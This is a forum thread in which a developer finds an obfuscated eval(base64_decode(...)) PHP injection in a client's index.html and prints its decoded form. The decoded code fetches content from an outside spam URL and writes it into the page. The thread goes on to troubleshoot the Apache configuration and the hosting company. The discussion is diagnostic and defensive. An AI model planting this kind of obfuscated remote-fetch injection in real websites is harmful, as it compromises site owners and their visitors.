base decode potential hack

[?foru]

Someone contacted me the other day about re-designing a site for them. Upon taking a look at the site (apache connection being attempted at the bottom of the html page) and viewing the source code it was loaded with spam links. I immediately advised them of what was going on and they had no idea.

...... was a long string of obfuscated code

PHP Code:

<?php eval(base64_decode(".........")); ?>

I changed "eval" to "print" and got the following...

PHP Code:

$l="http://tourreviews.asia/links2/link.php"; if (extension_loaded("curl")){ $ch = curl_init(); curl_setopt($ch, CURLOPT_TIMEOUT, 30); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_URL, $l); $r = curl_exec($ch); curl_close($ch);} else{$r=implode("",file($l));} print @$r; 


Luckily this wasn't anything that caused harm, because no code actually executed (maybe "curl" wasn't loaded remotely)...and it was only in index.html My guess is maybe a remote piece of code was parsing the php within the .html extension page.

I also found a folder on the site named "test" (junior hacker ) with a bunch of subfolders w/ html link pages in them.

This person was wondering if perhaps the previous person that worked on the site could have done something malicious (of course not enough info provided to solve on the forum). I couldn't see anything in the log files that stood out to me, but I thought I would post to see if anyone had any thoughts.

[Jesdisciple]

I'm clueless about the spam mess but curious... How was PHP code in an HTML page? Is Apache set to parse HTML pages?

[?foru]

Hackers can attempt stuff on any site really, but this is sort of a mystery on why someone would target this site that gets hardly any traffic to serve spam links. Tends to make me think that someone that worked on it previously was involved, but I can't say for sure. Server exploit might be another possibility.

I looked and the server this site is hosted on with plain .html extension pages is...Apache/1.3.29 (Unix) PHP/5.2.5 FrontPage/5.0.2.2623

That's what I was curious about Jesdisciple, when I gained server access I took a look at the index.html file and the php base64 script was contained in php tags like normal. Not sure if somehow a remote script was allowing it to execute even though it was contained within an .html page. When I viewed the source of the page it actually showed spam links.

I can easily clean the junk out of the index.html page and I have already started the new design, but this was more of a curiousity thing to see if anyone else had come across anything like this before.

[Jesdisciple]

Where is Apache's main configuration file? (You should ask your host if you don't know.) Also, do any of the web-accessible directories contain files named .htaccess?

Once you find any of those, use Ctrl+F to find AddHandler and (in the main config file) AccessFileName in them, and report the lines you find. (If you see a \ at the end of any line, copy the next line with it.)

If anyone has any thing to add, please say it; I'm definitely in over my head and swimming in this thread.

EDIT: BTW, if I'm correct (which I'm pretty sure I am), your server has an unnecessary load on it of parsing every .html page in case it contains PHP code. This would also seem to imply that it was the developer who did this stuff.

[?foru]

Sorry for the late reply. No .htaccess files on the server that I saw, but I have worked on servers before where they weren't visible right away since technically they are supposed to be "hidden" files.

I plan to use php for the new site, and I don't think the last developer had any experience with php so they reverted to the .html extension pages.

[Jesdisciple]

Yes, they are hidden by default on *nix. But, if the developer is allowed to use them, the host must have a means for you to access them. If the developer isn't allowed to use them, I don't think we need to worry about them (unless there's a serious security hole somewhere).

Have you asked your host about the .conf file? We need any AddHandler and AccessFileName directives out of it.

[?foru]

I found a blank folder named "conf" but that was it. They are hosted with a company named globat which I had never heard of before...and I emailed them but haven't heard anything yet. For now, I removed the garbage out of the page and it loads much faster.

[Jesdisciple]

Well, I don't guess we can do anything until they respond... I'll keep my subscription to this thread; just reply to resume the exploration.

[?foru]

The site is pretty much complete, and I just heard back from the hosting company

When I asked about the "conf" folder and the possibility of any any hidden files that could be running eventHandlers I was told that it's a default folder on their server setup and there are no hidden files in it.

When I asked about the 2 different stats folders because "old_stats" seemed a little odd, the answer they provided was how to access the site stats through the control panel.

When I explained there was a folder named "test" with 5 folders full of spam links , and 2 blank .zip files in that folder, I was told that I could delete that by logging into FTP and removing it...YOU THINK?

I asked about spam links and specifics to see if I could try to find out if they could spot a potential exploit on the server, or if they knew if was an isolated incident to this site alone. Either they didn't want to admit that it could have been a potential exploit on their server, or they really had no idea.

Changing the passwords was the first thing that I did just incase there was a remote script uploading new viruses, but that was also another suggestion offered by support.

Thanks again Jesdisciple for your input. I've already cleared out all the spam links in the folders, and have started to upload the new site which seems to be ok so far.

[Jesdisciple]

I'm by no means security-savvy, so we may be overreacting here. I just have some admin experience from being a hobbyist developer.

But I reiterate (because I don't see that you mentioned it) that I think your server has an unnecessary load. To confirm this, just put some Hello World PHP in a .html file and try requesting it. Unless your host considers that a feature, they should be eager to fix it and that might trigger some genuine concern for security. EDIT: Note that the previous developer may have requested of the host that .html files be parsed for PHP; don't assume it's not supposed to be like that.